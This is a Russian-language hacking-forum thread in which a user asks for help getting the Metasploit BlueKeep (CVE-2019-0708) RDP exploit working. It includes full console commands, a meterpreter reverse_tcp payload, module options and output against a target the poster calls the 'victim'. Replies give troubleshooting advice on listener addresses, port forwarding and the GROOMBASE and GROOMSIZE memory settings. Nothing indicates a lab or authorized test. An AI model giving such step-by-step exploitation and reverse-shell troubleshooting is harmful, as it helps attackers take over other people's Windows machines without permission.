ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

21.03.2020, 00:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 1296
Репутация:
0
|
|
Проблемма с использованиемCVE-2019-0708
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 200.000.100.28
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Exploiting target 200.000.100.28
[*] Started reverse TCP handler on 192.168.1.114:4444
[*] 200.000.100.28:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 200.000.100.28:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.000.100.28:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to 5.164.26.35 [COLOR="#ff0000"][SIZE="4"]
[*] 200.000.100.28:3389 - Surfing channels ...
[*] 200.000.100.28:3389 - Lobbing eggs ...
[-] 200.000.100.28:3389 - Exploit failed: NameError undefined local variable or method `rdp_move_mouse' for #
Может кто сталкивался, все перекопал не нашел похожей траблы.
|
|
|
|

21.03.2020, 06:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 3951
Репутация:
1
|
|
Покажи вывод "options"
|
|
|
|

21.03.2020, 14:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 1296
Репутация:
0
|
|
[SIZE="1"]msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS 200.100.100.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 3389 yes The target port (TCP)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.109 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.109:4444
[*] 200.100.100.100:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 200.100.100.100:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.100.100.100:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to [COLOR="#ff0000"]5.164.26.35
|
|
|
|

21.03.2020, 14:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 169390
Репутация:
47
|
|
[QUOTE="leikoz"]
leikoz said:
↑
Проблемма с использованием
CVE-2019-0708[*] Sending stage (206403 bytes) to
5.164.26.35
[COLOR="#ff0000"][SIZE="4"]
|
|
|
|

21.03.2020, 20:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 1296
Репутация:
0
|
|
Сообщение от fandor9
fandor9 said:
↑
Вы порт 4444 пробрасываете на своём роутере? или как вы подключены к интернету? Я так понимаю RDP_CLIENT_IP должен быть вашим внешним адресом.
да порт проброшен, этот адресс "5.164.26.3" вообще не понятно откуда берется это не мой адресс и близко, бывают и другие, дело в том что там должен стоять ип жертвы тоесть "[*] Sending stage (206403 bytes) to 200.000.100.28" должно быть
видео правильной работы
|
|
|
|

22.03.2020, 03:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 3935
Репутация:
3
|
|
Сообщение от leikoz
leikoz said:
↑
[SIZE="1"]msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS 200.100.100.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 3389 yes The target port (TCP)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.109 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.109:4444
[*] 200.100.100.100:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 200.100.100.100:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.100.100.100:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to [COLOR="#ff0000"]5.164.26.35
LHOST Ваш внешний адрес.
LPORT Внешний порт.
Потом укажите локальный порт и адрес через ReverseListenerBindAddress и ReverseListenerBindPort.
Подробнее посмотреть: show advanced
|
|
|
|

22.03.2020, 07:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 1296
Репутация:
0
|
|
Сообщение от hibar1Xs
hibar1Xs said:
↑
LHOST
Ваш внешний адрес.
LPORT
Внешний порт.
Потом укажите локальный порт и адрес через
ReverseListenerBindAddress
и
ReverseListenerBindPort
.
Подробнее посмотреть:
show advanced
не помогло.. все тоже самое происходит, буду пробовать с другой машины
|
|
|
|

22.03.2020, 13:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 169390
Репутация:
47
|
|
Сообщение от leikoz
leikoz said:
↑
не помогло.. все тоже самое происходит, буду пробовать с другой машины
может быть у вас не подходят адреса памяти (GROOMBASE) и размер памяти (GROOMSIZE), за счёт чего сплоит читает левый адрес памяти, где стоит всё что угодно, и берёт его как адрес. Тогда естественно сплоит летит мимо и падает. Тоесть вам надо подобрать правильный адрес и размер.
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|